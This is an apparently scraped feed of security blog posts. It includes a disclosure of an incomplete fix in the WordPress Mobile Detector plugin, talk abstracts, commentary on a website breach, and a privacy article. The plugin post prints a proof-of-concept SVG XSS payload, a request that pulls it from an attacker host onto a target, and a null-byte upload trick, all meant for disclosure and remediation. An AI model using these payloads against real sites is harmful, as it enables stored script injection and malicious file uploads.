<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_KVFCEVI0RUiDccV-ESZitO6eMlXn-a9TstmGHpT6fSvx_x99f3uzZb67gZxKkGrhifbULb2TtA2KpN4FrBb2lLkGRw2bFYNNvMk7LLdN8owVY-EGCIGcK8-eECD-UOe3Xp4g4czFw-I/s1600/test.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_KVFCEVI0RUiDccV-ESZitO6eMlXn-a9TstmGHpT6fSvx_x99f3uzZb67gZxKkGrhifbULb2TtA2KpN4FrBb2lLkGRw2bFYNNvMk7LLdN8owVY-EGCIGcK8-eECD-UOe3Xp4g4czFw-I/s640/test.png" width="640" /></a></div>
As you can see from the above screenshot that the page is hosted on <b><a href="http://xn--ngbrx4e.xn--mgbaam7a8h/" rel="nofollow" target="_blank">عربي.امارات</a></b> , however the address bar points to <b>google.com</b>.<br />
<b><br /></b>
<b><u>Important Note</u></b><br />
<b><br /></b>
Variation of similar vulnerability has also been discovered in several other browsers that are still undergoing a fix there i am refraining from disclosing them. Details will be disclosed, once a fix has been landed. </div>
<u style="font-weight: bold;"><br /></u>
<u style="font-weight: bold;">Fix</u><br />
<span style="font-weight: bold;"><br /></span>
<span style="font-weight: bold;">RFC 3987 § 4.1 states that </span><span style="font-weight: bold;">"<b>Bidirectional IRIs MUST be rendered in the same way as they would be if they were in a left-to-right embedding.</b>", </span><span style="font-weight: bold;">therefore s</span><span style="font-weight: bold;">etting paragraph direction to LTR fixes this issue. </span>This is a known issue and has already been discussed in great detail <a href="https://bugs.chromium.org/p/chromium/issues/detail?id=495933" rel="nofollow" target="_blank">here</a>.<br />
<b><u><br /></u></b>
<b><u>Credits</u></b><br />
<b><br /></b>
I am highly indebted to "<b>Matt Giuca</b>" from the Google Chrome team for his extensive help on this issue and "<b>Tod Beardsley</b>" for handling the disclosure.<br />
<br /></div>
<b><u>Bug Bounty</u><b> </b></b><br />
<b><b><br /></b></b>
The total bounty rewarded for all bugs combined was 5000$.
</div>
<script>
location.href="https://www.rafaybaloch.com/2017/06/google-chrome-firefox-address-bar.html";
</script>Rafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.com0tag:blogger.com,1999:blog-3121270199089759062.post-65169161150501873002016-06-13T00:58:00.000-07:002020-05-27T14:24:13.634-07:00Wordpress Mobile Detector Incorrect Fix Leads To Stored XSS<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiB9zImlV09G0B-_SgO2pPpZlJjIh1AYltg4HtPQzOiLFEVxt-YG9k-QlbRjFjJhvjzVBbrDw-_vzzPwZ4O2en0lUw1cN00MagA2aXeVTyH5LICjJlzJC9RFXZEWsJyWlZGjNGf_YcawHs/s1600/wordpress.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiB9zImlV09G0B-_SgO2pPpZlJjIh1AYltg4HtPQzOiLFEVxt-YG9k-QlbRjFjJhvjzVBbrDw-_vzzPwZ4O2en0lUw1cN00MagA2aXeVTyH5LICjJlzJC9RFXZEWsJyWlZGjNGf_YcawHs/s400/wordpress.jpg" width="400" /></a></div>
<div>
<br /></div>
Recently, Wordpress Mobile Detector plugin was in news for the "<b><a href="https://www.communications.gov.au/what-we-do/internet/stay-smart-online/alert-service/update-wordpress-mobile-detector-plugin-prevent-security-issues" rel="nofollow" target="_blank">Remote Code Execution</a></b>" vulnerability that was found inside the resize.php file. The vulnerability allowed an external attacker to upload arbitrary files to the server as there was no validation being performed for the file-type that has to be retrieved from an external source.<br />
<div>
<br /></div>
<div>
Soon after the vulnerability became public, the plugin was taken down from wordpress directory until the issue was fixed. However, as per my analysis the fix is incomplete and leads to stored XSS. </div>
<div>
<a name='more'></a><div>
<h4>
The Vulnerability</h4>
</div>
<div>
<div>
Let's discuss about the initial vulnerability first. The following PHP code takes input via src parameter (GET or POST) and checks for the existence of the file. If it exists, appropriate content-type header is set. </div>
<div>
<br /></div>
<div>
<u><b>Code</b></u></div>
<div>
<br /></div>
<div>
<?php</div>
<div>
if (isset($_REQUEST['src'])) { $path = dirname(__FILE__) . "/cache/" . basename($_REQUEST['src']);</div>
</div>
<div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>if(file_exists($path)){</div>
</div>
<div>
.</div>
<div>
.</div>
<div>
.</div>
<div>
.</div>
<div>
file_put_contents($path, file_get_contents($_REQUEST['src']));</div>
<div>
<b><u><br /></u></b></div>
<div>
?></div>
<div>
<br /></div>
<div>
It then utilizes the file_get_contents function in order to fetch file contents from a URL and upload it to the webhost under cache directory. Please note that, this is only possible if allow_url_fopen is enable upon the server which limits the effectiveness and impact of the exploit. The problem with the above code is that the code does not perform any check for extensions that are allowed. So, in case if an can fetch/execute PHP, ASPX code it results in a code execution.</div>
<div>
<h4>
The (incomplete) Fix</h4>
</div>
</div>
<div>
The following fix was implemented which defined a whitelist of all extensions that are acceptable (primarily images). The code checks if the requested file ends with the whitelisted extensions before they are fetched and uploaded. </div>
<div>
<br /></div>
<div>
<?php</div>
<div>
.</div>
<div>
.</div>
<div>
.</div>
<div>
.</div>
<div>
.</div>
<div>
<div>
$acceptable_extensions = [<b>'png','gif','jpg','jpeg','jif','jfif','<span style="color: red;">svg</span>'</b>];</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>$info = pathinfo($_REQUEST['src']);</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>// Check file extension</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>if(in_array($info['extension'],$acceptable_extensions)){</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>file_put_contents($path, file_get_contents($_REQUEST['src']));</div>
<div>
<br /></div>
<div>
?></div>
</div>
<div>
<br /></div>
<div>
The problem with the above fix is that it whitelists "<b>svg</b>" extension. It is a widely known fact that svg images can execute JavaScript. </div>
<div>
<b><u><br /></u></b></div>
<div>
<h4>
Using SVG To Trigger Stored XSS</h4>
</div>
<div>
In order to demonstrate the finding, The following svg file would be hosted on a Remote Server. </div>
<div>
<br /></div>
<div>
<b>test.svg</b></div>
<div>
<div>
<br /></div>
<div>
<b><?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><span style="color: red;"><svg onload="alert(1)"</span> xmlns="http://www.w3.org/2000/svg"><defs><font id="x"><font-face font-family="y"/></font></defs></svg></b></div>
</div>
<div>
<br /></div>
<div>
<div>
This image once requested via "<b>src</b>" parameter will be saved to cache directory:</div>
<div>
<b><br /></b></div>
<div>
<b>http://www.example.com/wp-content/plugins/wp-mobile-detector/resize.php?src=<span style="color: red;">evilsite.com/test.svg</span></b></div>
<div>
<br /></div>
<div>
Upon visiting the uploaded image: </div>
<div>
<br /></div>
<div>
<b>http://www.example.com/wp-content/plugins/wp-mobile-detector/cache/test.svg</b></div>
<div>
<br /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZuXp_t3KZxjvgMZLv0A00PKbTc1GZv4a7YzqvPWhVHUJQhnekXZMQTv1ohejYoZnsZjC6In8wN5CofsKmnELiZEc-N2i1IsjhLh8Lrq6EMZs_15W5oyi0R4OG7XXzNWTXc5jutR-Q-Tc/s1600/redirection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZuXp_t3KZxjvgMZLv0A00PKbTc1GZv4a7YzqvPWhVHUJQhnekXZMQTv1ohejYoZnsZjC6In8wN5CofsKmnELiZEc-N2i1IsjhLh8Lrq6EMZs_15W5oyi0R4OG7XXzNWTXc5jutR-Q-Tc/s640/redirection.png" width="640" /></a></div>
</div>
<div>
<h4>
Other Attack Possibilities</h4>
</div>
<div>
i) In case where path finishes with an allowed extensions there is an attack possibility - <b>victim.com/test.php/test.jpg</b>.</div>
<div>
<b><br /></b>
<b>ii)</b> In older version of PHP, it is possible to append a nullbyte and tricking the server into uploading a malicious PHP file. Example - <b>http://evil.com/malicious.php<span style="color: red;"></span>.svg</b></div>
<div>
<br /></div>
<div>
<b>iii)</b> In case if Display_errors is set to true in php.ini file. The file_get_contents() function can be utilized for . A similar issue was discovered by me in the year 2013. You can refer to the following blog post - <a href="http://www.rafayhackingarticles.net/2013/11/phpthumb-server-side-request-forgery.html" target="_blank"><b>phpThumb Server Side Request Forgery</b></a></div>
<div>
<br /></div>
<div>
<b>iv) </b>In case where path finishes with an allowed extensions there is an attack possibility - <b>victim.com/test.php/test.jpg. </b></div>
<div>
<b><br /></b></div>
<div>
<b>v) </b>Even allowing external users to fetch and upload images can external images might introduce issues such as someone can host porn images and tarnish companies reputation, someone can deliberately upload a copyrighted image and sue the company, since there is no limit to the number of images one can upload, one can still attempt to exhaust server resources by uploading tons of images. </div>
<div>
<div>
<h4>
<u>Suggested Fix For Vendor </u></h4>
<div>
<span style="font-weight: normal;">i) The suggested fix is removing the "svg" extension from whitelist</span><br />
<br />
<b>$acceptable_extensions = ['png','gif','jpg','jpeg','jif','jfif''];</b><br />
<div>
</div>
</div>
<div>
<div style="font-weight: normal;">
<b><br /></b><b>ii) </b>File names should be re-written after they are uploaded, so that their location may not be guessed. along with directory listing should also be disabled. </div>
</div>
<div>
<br /></div>
<div>
<h4>
Suggested Fix For Webmasters</h4>
</div>
</div>
<div>
<b>iii)</b> Server administrators should modify the .htaccess file to only support allowed extensions. and prevent accessing other files.</div>
<div>
<br />
<b>iv)</b> Content-Type-Options: nosniff header to prevent exploiting the site using SWF file with .jpg extension for example - <b><a href="https://github.com/nccgroup/CrossSiteContentHijacking" rel="nofollow" target="_blank">https://github.com/nccgroup/CrossSiteContentHijacking</a>.</b><br />
<b><br /></b>
<b>v) </b>Content-Disposition header should be utilized.<br />
<b><br /></b>
Thanks for<b> Soroush Dallili </b>from NCC group and <b>Daniel Sid</b> from Sucuri for tipping off. </div>
</div>
</div>
<script>
location.href="http://www.rafaybaloch.com/2017/06/wordpress-mobile-detector-incorrect-fix.html";
</script>
Rafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.com1tag:blogger.com,1999:blog-3121270199089759062.post-54517515189376058372016-06-05T01:35:00.000-07:002020-05-27T14:21:50.995-07:00Acunetix Website Hack And Lessons Learnt <div dir="ltr" style="text-align: left;" trbidi="on">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwrPT-4qTiPRfdYd-bmfMid8l6cjbhv1bE9hXDOKxVtSQcD8lMyteGFAGqmchb1pzo1wFNGEq5uKPz32HaUSknC8J1bG30vAdLx_usG6j_bKMV500nA4o4maIz7ox_KKGw4ncy9pCfmJY/s1600/Screenshot_2.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwrPT-4qTiPRfdYd-bmfMid8l6cjbhv1bE9hXDOKxVtSQcD8lMyteGFAGqmchb1pzo1wFNGEq5uKPz32HaUSknC8J1bG30vAdLx_usG6j_bKMV500nA4o4maIz7ox_KKGw4ncy9pCfmJY/s640/Screenshot_2.png" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b><br /></b>
<b>Update: Acunetix has just released an official response about the incident, read it <a href="http://www.acunetix.com/official-statement-alleged-acunetix-website-defacement-incident/" rel="nofollow" target="_blank">here</a>.</b><br />
<b><br /></b>
Last night, Website of <a href="http://www.zone-h.org/mirror/id/26349487" rel="nofollow" target="_blank">Acunetix</a>(A Wellknown Automated Web Application Scanner) was hacked by Croatian hackers. From that point of this onward the website has been taken offline and acunetix team are reviewing the root cause for the hack. Currently the homepage is displaying a "403 Forbidden error", it might be due to the fact that either the attacker has deleted all he files or developers have deliberately taken it down in order to review the files for any possible backdoor that might had been injected.<br />
<br />
<div style="text-align: center;">
<i>Courtesy - http://exploitgate.com/acunetixs-website-got-hacked-croatian-hackers/</i></div>
<div style="text-align: center;">
<i></i></div>
<a name='more'></a><div style="text-align: center;">
<b><br /></b></div>
<h4>
Lessons Learnt </h4>
Up till now the cause of the hack remains unknown as Acunetix is yet to acknowledge it. However, The hack gives us the following important generic lessons:<br />
<br />
<b>i) </b>Defense is more difficult than offense. For defense you have to find and close 100 doors which an attacker can use to get into the Server, For offense the attacker has to find one single way to get in.<br />
<br />
<b>ii) </b>WebApplications now days have became extremely complex with new features being added on daily basis. It's almost impossible to achieve complexity and Security at the same time. <br />
<br />
<b>iii)</b> Automated Scanners and Web Application Firewalls won't necessarily protect your Webapplications. As both of them do not understand Business Logic of the Application. Defense in depth principle should be followed where Security should be ensured at all layers. You can refer my article "<a href="http://www.rafayhackingarticles.net/2015/12/secure-application-development-Modern-Defenses.html" target="_blank"><b>Secure Application Development And Modern Defenses</b></a>"<br />
<b><br /></b>
<b>iv) </b>Security is not a one time job, it's an ongoing process, no specific requirement has to be met for 100% security.<br />
<div>
<br /></div>
<div>
One of the arguments that People would use is "<b>How can their Tool ensure our Webapplication's Security, when they cannot protect themselves from getting hacked?</b>", the answer is absolutely nothing can ensure 100% security,We have seem many Security products failing to ensure their own security, one of the examples can be found <a href="http://imperva%20securesphere%20web%20application%20firewall%20mx%209.5.6%20-%20blind%20sql%20injection/" target="_blank">here</a> (<b>Imperva SecureSphere Web Application Firewall MX 9.5.6 - Blind SQL Injection</b>), <a href="http://www.infosecnews.org/so-who-hacked-ec-council-three-times-this-week/" rel="nofollow" target="_blank">here</a> (<b> So Who Hacked EC-Council Three Times This Week?</b>) and <b><a href="https://www.sophos.com/en-us/support/knowledgebase/118424.aspx" rel="nofollow" target="_blank">here</a> (Tavis Ormandy finds vulnerabilities in Sophos Anti-Virus products) </b>and it's perfectly normal.</div>
<div>
<br />
The problem comes when these product owner instead of acknowledging and responding to the breach wishes to remain silent and thereby loosing it's credibility even further in the eyes of customers and well as infosec community. It is the right of the customers to know whether their data was compromised in the breach and if yes up to what extent and if passwords were compromised, how were they storing the passwords.<br />
<br />
With that being said, i would like to highlight the fact that they will not necessarily go out of the business after this hack. Eccouncil has been hacked multiple times and they are still in the business. </div>
</div>
<script>
location.href="http://www.rafaybaloch.com/2017/06/acunetix-website-hack-and-lessons-learnt.html";
</script>
Rafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.com0tag:blogger.com,1999:blog-3121270199089759062.post-65988598475968082222016-05-03T14:37:00.003-07:002020-05-27T14:28:46.211-07:00Bypassing Modern WAF's Exemplified At XSS (Webcast)<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<img height="366" src="https://media.licdn.com/mpr/mpr/AAEAAQAAAAAAAARMAAAAJGMxY2JjYTkwLTcwNGQtNGZhNS1iMTRjLWJhNzNhYmIzMmMyMQ.png" width="577" />
<br />
<br />
Past Saturday, I conducted a "<b>Webcast</b>" on "<b>Garage4hackers</b>" on one of my favorite subjects in the field of Information Security i.e. "<b>WAF Bypass</b>". Initially, i had decided to present something on the topic of "<b><a href="http://www.rafayhackingarticles.net/2016/04/bypassing-browser-security-policies-for-Fun-And-Profit-Full-Video.html" target="_blank">Mobile Browser Security</a></b>" due to the fact that this has been a topic I have been recently conducting a research on.<br />
<br />
However i later realized that the "<b>TakeAways</b>" would not be much helpful, therefore i decided to talk about something that Bughunters/Pentesters can use in their day to day pentests and security engagements and hence i decided to present on this topic.<br />
<br />
I must admit that the response has been overwhelming along with it, i have also managed to get a chance to learn more from the feedback and CTF responses.<br />
<br />
I would like to specially thank "<b>Imdadullah</b>", "<b>Himanshu</b>", "<b>Sandeep"</b> along with other <b>garage4hackers </b>members for inviting/supporting me through out the journey. One of the best things "<b>G4H Community" </b>is the work they are doing for the security community by conducting free of cost Webcasts. You can find a list of other Webcasts here - "<b><a href="http://www.garage4hackers.com/ranchoddas" rel="nofollow" target="_blank">http://www.garage4hackers.com/ranchoddas</a></b>/"<br />
<a name='more'></a><h4>
Abstract</h4>
</div>
It is known that over the years, a trend that addresses the information security landscape has emerged, I mean, web applications are under attack, given this perspective, Web Application Firewalls are becoming increasingly popular, which are most commonly used by organizations to protect against various attacks such as SQL Injection, XSS etc.<br />
<br />
While WAF's may help preventing application layer attacks up to some extent, however they certainly are not replacements for input validation and secure coding practices due to the fact that they are based upon Blacklists which means rejection of known patterns while allowing everything else. The problem, especially in case of JavaScript is that it's simply not possible to create blacklists capable of blocking all patterns without having to generate false positives due to the dynamic nature of javaScript and infinite ways of obfuscating the payload.<br />
<br />
In this webinar, the we will talk about various techniques that can be used to bypass WAF"s such as Brute Forcing, Regular expression reversing and browser bugs. The webinar would mostly discuss<br />
<br />
<b><u>Prerequisite</u></b><br />
<br />
- Basic knowledge about HTML/JavaScript<br />
<br />
- Basic know how about XSS attacks<br />
<div>
<br /></div>
<b><u>Webcast </u></b><br />
<b><u><br /></u></b>
<b><u><br /></u></b>
<iframe allowfullscreen="" frameborder="0" height="360" src="https://www.youtube.com/embed/dWLpw-7_pa8" width="577"></iframe>
<b><u> </u></b><br />
<b><u><br /></u></b>
<b><u>CTF Competition</u></b><br />
<b><u><br /></u></b>
After the webinar, we had this "CTF" challenge made up by a friend of mine "<b>FileDescriptor</b>", certain parts the first two challenges are based upon characteristics of a real world WAF that I encountered in wild which was combined with FD's ideas to make up the challenge . The last challenge is based upon "<b>@FileDescriptor</b>" unqiue idea and hence, it's not easy to crack and hence we named it as "<b>Hard</b>".<br />
<br />
<b>CTF Link :<a href="http://92.222.71.224/" rel="nofollow" target="_blank">http://92.222.71.224</a></b>
</div>
<script>
location.href="http://www.rafaybaloch.com/2017/06/bypassing-modern-wafs-exemplified-at.html";
</script>
Rafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.com2tag:blogger.com,1999:blog-3121270199089759062.post-76523278766925731312016-04-21T11:02:00.001-07:002020-05-27T14:29:35.991-07:00Bypassing Browser Security Policies for Fun and Profit (Full Presentation Video)<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhYHFnwt3haDbTJGnIO3ri04bttelrblMyS-nh5qu8lly8K_PGzredpUEUM2T-Pymci0H1oFMiZu_t2Sk_0zakrp4lWEQYenbWcicCfpPcWzFSqSk_EaIh_2jkgmrwURGbHWo6F06pd9M/s1600/black-hat-asia-2016.jpg" imageanchor="1" style="background-color: white; color: #666666; font-family: Verdana; font-size: 12px; line-height: 19.2px; margin-left: 1em; margin-right: 1em; text-align: center; text-decoration: none;"><img border="0" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhYHFnwt3haDbTJGnIO3ri04bttelrblMyS-nh5qu8lly8K_PGzredpUEUM2T-Pymci0H1oFMiZu_t2Sk_0zakrp4lWEQYenbWcicCfpPcWzFSqSk_EaIh_2jkgmrwURGbHWo6F06pd9M/s320/black-hat-asia-2016.jpg" style="border-width: 0px; padding: 10px;" width="320" /></a></div>
Blackhat has just recently released the full video for my talk on the subject of "<b><a href="http://bypassing%20browser%20security%20policies%20for%20fun%20and%20profit%20%28blackhat%20asia%202016%29/" rel="nofollow" target="_blank">Browser Security</a></b>", If you wish to read the Whitepaper/Slides and SOP Test Suite, you can refer to my previous post on "<b><a href="http://bypassing%20browser%20security%20policies%20for%20fun%20and%20profit%20%28blackhat%20asia%202016%29/" rel="nofollow" target="_blank">Bypassing Browser Security Policies For Fun And Profit</a></b>"<br />
<b></b><br />
<a name='more'></a><br />
<b>Abstract</b><br />
<b><br /></b>
<i>Mobile browsers in comparison to desktop browsers are relatively new and have not gone under same level of scrutiny. Browser vendors have introduced and implemented tons of protection mechanisms against memory corruption exploits, which makes it very difficult to write a reliable exploit that would work under all circumstances. This leaves us with the "other" category of Client Side attacks. In this presentation, we will present our research about bypassing core security policies implemented inside browsers such as the "Same Origin Policy," and "Content Security Policy," etc. </i><br />
<i><br /></i>
<i>We will present several bypasses that were found in various mobile browsers during our research. In addition, we will also uncover other interesting security flaws found during our research such as Address Bar Spoofing, Content Spoofing, Cross Origin CSS Attacks, Charset Inheritance, CSP Bypass, Mixed Content Bypass, etc., as found in Android Browsers. We will also talk about the testing methodology that we used to uncover several android zero days. Apart from the theory, our presentation will also disclose a dozen of the most interesting examples of security vulnerabilities and weaknesses highlighted above, which we identified in the most popular Android third-party web browsers, and in Android WebView itself.</i><br />
<i><br /></i>
<i> We will explain the root cause of the bug and demonstrate their exploitation, show examples of vulnerable code and, where possible, patches that were issued to address these vulnerabilities. Finally, we will demonstrate a sample test suite which can be used to assess basic security properties of any mobile web/browser.</i><br />
<br /></div>
<iframe allowfullscreen="" frameborder="0" height="480" src="https://www.youtube.com/embed/P5R4KeCzO-Q" width="854"></iframe></div>
<script>
location.href="http://www.rafaybaloch.com/2017/06/bypassing-browser-security-policies-for_6.html";
</script>Rafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.com2tag:blogger.com,1999:blog-3121270199089759062.post-26695567300708320892016-04-13T07:07:00.000-07:002020-05-27T14:30:02.102-07:00How Much Do Hackers Know About You?<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpJcXnmdukM9SAr61GQB9lS24HZDOUQYveArvRTm42hS6kzrtk-__2dmfCwsVvl1KwTO4_f2IIXMG0ayzd2na_VfLRLsou73aiq7b0iU6TeBO0atzZ66EmkqNnbsF-LdNzDkeQHcN9JSs/s1600/Hacker-silhouette.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="265" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpJcXnmdukM9SAr61GQB9lS24HZDOUQYveArvRTm42hS6kzrtk-__2dmfCwsVvl1KwTO4_f2IIXMG0ayzd2na_VfLRLsou73aiq7b0iU6TeBO0atzZ66EmkqNnbsF-LdNzDkeQHcN9JSs/s400/Hacker-silhouette.jpg" width="400" /></a></div>
<br />
The threat of black hat hackers has never been greater than now, considering the increasing organization of their efforts to make a dollar off of your digital assets and information. The common portrayal of the hacker is someone who knows enough about programming and the internet that they can seemingly access any information or know anything about anyone.<br />
<br />
This is mostly an exaggeration. Finding information on someone is still work, sometimes very time-consuming and usually not worth the effort from a financial standpoint unless done on a large scale. It does beg the question, however, of how much hackers might know about you. Based on the trails you leave online and who you trust your information with, a hacker might already have a file with your name on it. It is a question worth investigating.<br />
<br />
<a name='more'></a><br />
The answer is different for every person. <b><u>Here are some factors you need to take into consideration:</u></b><br />
<h4 style="text-align: left;">
Public Network Usage</h4>
How often do you use dangerous public networks to conduct online transactions or communicate with others? If you use them at all without protection, you leave yourself open to data interception. Hackers will often hang out in cafes or other public places with WiFi and use a “sniffing” device to take in the traffic of anyone unfortunate enough to be sending and receiving data over the network. Think back to what you’ve sent over a public network. Anything you sent or received could very well be in the hands of a hacker.<br />
<br />
The best way to protect yourself on a public network (other than not using it) is to equip your device with a strong Virtual Private Network (VPN). A VPN will connect your device to an offsite secure server via an encrypted connection, allowing you to keep your information a secret from anyone hoping to look on. As an added benefit, your IP address will be masked by that of the offsite server, so you will be able to avoid tracking in that manner as well.<br />
<h4 style="text-align: left;">
Large Scale Data Breaches</h4>
Do you know if your information has been leaked in a large scale data breach such as the Office of Personnel Management attack or the Target credit card scandal? If so, you might not have been immediately targeted for an attack, but it doesn’t mean that the information has vanished from the internet. For the right price, that data (or large sets of data containing your information at a wholesale price) could be sent to an interested party. Some might not apply anymore, but with the right information, you could be traced.<br />
<br />
To prevent this sort of thing in the future, the most you can do is choose the right organizations to trust your information to. Try to lobby for stronger standards of cybersecurity with the businesses you use and the government. You can’t control organizations, but you can control who you trust.<br />
<h4 style="text-align: left;">
Has One Account Been Compromised?</h4>
Much like dominoes, the breach of even one of your accounts can lead to a loss of other accounts linked to it or sharing data. Try to imagine what would happen if someone else had access to your email account. They would likely need only an hour to completely ruin your online life, should they want to. One social media account breach could easily lead a hacker to copy all of your conversations and scan them for private information. They might not even read it until the time is right to scam or blackmail you.<br />
<br />
Think back and ask yourself if even the most minor of your accounts has been compromised. If so, ask yourself how long ago the incident took place. Look more into the data you could have lost at that time and whether it still is relevant today (some will be). Remember that in addition to financial information, the names of friends and family members could be linked with your accounts.<br />
<h4 style="text-align: left;">
What Do You Keep on Your Computer?</h4>
Much of what black hat hackers do involves malware and using it to gain information on you. While some malware acts more like ransomware or a portal to let other malware in, other malware (or the same malware as a secondary measure) collects whatever information it can from you and sends the data on to its creator or owner.<br />
<br />
If you’ve ever been the victim of malware, a lot of what you keep on your computer could be known by a hacker. Make sure that you try to avoid shady websites and use the best tools you can such as a high quality security suite to keep malicious programs off of your precious devices.<br />
<h4 style="text-align: left;">
Privacy and Social Media Presence</h4>
Even if you keep your social media accounts safe, a hacker could use them to find out important information about you. Privacy is important to fend off malevolent hackers in a world of sharing.<br />
<b><br /></b>
<b>Consider the following:</b><br />
<br />
<ul style="text-align: left;">
<li>If you tag your location in a public post often enough, they might be able to get a general idea of your routine.</li>
<li>If you don’t make your accounts as private as possible, a clever hacker might be able to use your public communications with your friends against you and deduce some of your movements and activities.</li>
<li>Even things such as the time of day you post can say a lot about you. A skilled hacker can use even the most basic information such as this to help build a plan to scam you better.</li>
<li>Doing a quick Google search of yourself online is a great way to determine how private you are online. If you can find it out through Google, have no doubt a hacker can find out the same information.</li>
</ul>
<br />
This is clearly a difficult question to answer for certain, but hopefully by this point you have a better idea of what to look out for and what a hacker could know about your personal life and what information they could have. You aren’t defenseless, but further vigilance regarding all of your online activities is required.<br />
<br />
Do you think there are any other factors to consider when trying to figure out how much a hacker could potentially know about you? Are there any other tools and methods of protections you would recommend? Please leave a comment below with your thoughts on the matter to continue this conversation.<br />
<div>
<h4>
About The Author</h4>
Cassie is a cyber security enthusiast who writes for "<a href="https://securethoughts.com/express-vpn-review/" rel="nofollow" target="_blank"><b>SecureThoughts</b></a>" who understands that hackers will do anything they can to get information on anyone they can. The more you know, the better you can protect yourself, and ultimately that is her goal, to help others learn how to best protect themselves. </div>
</div>
<script>
location.href="http://www.rafaybaloch.com/2017/06/how-much-do-hackers-know-about-you.html";
</script>
Farhan Azamhttp://www.blogger.com/profile/07946638849267227635noreply@blogger.com0tag:blogger.com,1999:blog-3121270199089759062.post-10590580676022333082016-03-31T04:49:00.001-07:002020-05-27T14:30:17.835-07:00Bypassing Browser Security Policies For Fun And Profit (Blackhat Asia 2016)<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhYHFnwt3haDbTJGnIO3ri04bttelrblMyS-nh5qu8lly8K_PGzredpUEUM2T-Pymci0H1oFMiZu_t2Sk_0zakrp4lWEQYenbWcicCfpPcWzFSqSk_EaIh_2jkgmrwURGbHWo6F06pd9M/s1600/black-hat-asia-2016.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhYHFnwt3haDbTJGnIO3ri04bttelrblMyS-nh5qu8lly8K_PGzredpUEUM2T-Pymci0H1oFMiZu_t2Sk_0zakrp4lWEQYenbWcicCfpPcWzFSqSk_EaIh_2jkgmrwURGbHWo6F06pd9M/s320/black-hat-asia-2016.jpg" width="320" /></a></div>
<br />
Few hours back, i delivered a talk at Blackhat Asia 2016 on <b>"Bypassing Browser Security Policies For Fun And Profit</b>", the talk covered wide variety of topics starting from SOP bypasses, CSP bypass so on and so forth. Due to limited time i was only able to cover few topics, however, you can find rest of the topics in the WhitePaper below. The following was the abstract:<br />
<a name='more'></a><b><br /></b>
<br />
<h4>
Abstract</h4>
<br />
'<i>Mobile browsers in comparison to desktop browsers are relatively new and have not gone under same level of scrutiny. Browser vendors have introduced and implemented tons of protection mechanisms against memory corruption exploits, which makes it very difficult to write a reliable exploit that would work under all circumstances. This leaves us with the "other" category of Client Side attacks. In this presentation, we will present our research about bypassing core security policies implemented inside browsers such as the "Same Origin Policy," and "Content Security Policy," etc. </i><br />
<i><br /></i>
<i>We will present several bypasses that were found in various mobile browsers during our research. In addition, we will also uncover other interesting security flaws found during our research such as Address Bar Spoofing, Content Spoofing, Cross Origin CSS Attacks, Charset Inheritance, CSP Bypass, Mixed Content Bypass, etc., as found in Android Browsers. We will also talk about the testing methodology that we used to uncover several android zero days.</i><br />
<i><br /></i>
<i>Apart from the theory, our presentation will also disclose a dozen of the most interesting examples of security vulnerabilities and weaknesses highlighted above, which we identified in the most popular Android third-party web browsers, and in Android WebView itself. </i><br />
<i><br /></i>
<i>We will explain the root cause of the bug and demonstrate their exploitation, show examples of vulnerable code and, where possible, patches that were issued to address these vulnerabilities. Finally, we will demonstrate a sample test suite which can be used to assess basic security properties of any mobile web/browser</i>'<br />
<br />
<b></b><br />
<h4>
<b>WhitePaper</b></h4>
<div>
<b><br /></b></div>
<div style="text-align: center;">
